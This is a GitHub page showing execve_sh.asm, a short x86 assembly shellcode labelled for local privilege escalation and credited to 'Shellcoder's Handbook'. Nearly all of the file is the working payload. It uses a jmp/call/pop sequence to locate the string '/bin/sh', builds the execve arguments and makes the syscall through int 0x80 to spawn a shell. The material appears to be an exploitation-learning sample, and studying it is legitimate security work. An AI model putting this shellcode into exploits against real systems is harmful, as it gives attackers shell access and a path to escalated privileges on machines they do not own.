-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathexecve_sh.asm
More file actions
37 lines (30 loc) · 806 Bytes
/
execve_sh.asm
File metadata and controls
37 lines (30 loc) · 806 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
; *****************************************************
; Basic Shellcode for LPE
;
; Makes an execve() low level syscall and executes
; /bin/sh. It uses relative addresses to make it more
; portable
;
; From awesome Jack Koziol book "Shellcoder's Handbook"
;
; ****************************************************
; nasm -f elf execve2.asm
section .text
global _start
_start:
jmp short GotoCall
shellcode:
pop esi
xor eax,eax
mov byte [esi + 7], al ; J = 0x0
lea ebx, [esi]
mov long [esi + 8], ebx ; AAAA = /bin/sh string address
mov long [esi + 12], eax ; KKKK = 0x0000
mov byte al, 0x0b ; execve syscall nr
mov ebx, esi ; argv1
lea ecx, [esi + 8] ; argv2
lea edx, [esi + 12] ; argv3
int 0x80
GotoCall:
call shellcode
db '/bin/sh'